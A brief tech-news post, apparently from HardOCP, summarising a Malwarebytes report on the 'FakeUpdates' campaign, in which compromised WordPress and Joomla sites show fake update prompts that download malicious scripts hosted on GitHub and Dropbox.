Malwarebytes Labs has written a very in depth article on their blog about a malware campaign that they are calling “FakeUpdates.” The campaign uses vulnerabilities in multiple website Content Management Systems to inject malicious code that prompt users that a program on their computer is out of date, and starts a download of a malicious file.



Even more nefarious is the fact that these attacks use legitimate file hosting services to spread the malicious files, such as GitHub and DropBox. The article goes deep into the details on how the script is injected on various platforms, but a simple crawler made by Malwarebytes found several hundred compromised WordPress and Joomla websites. Thanks to @cageymaru for the story.

This campaign relies on a delivery mechanism that leverages social engineering and abuses a legitimate file hosting service. The ‘bait’ file consists of a script rather than a malicious executable, giving the attackers the flexibility to develop interesting obfuscation and fingerprinting techniques.

Discussion

Source: [H]ardOCP – ‘FakeUpdates’ Campaign Leverages Multiple Website Platforms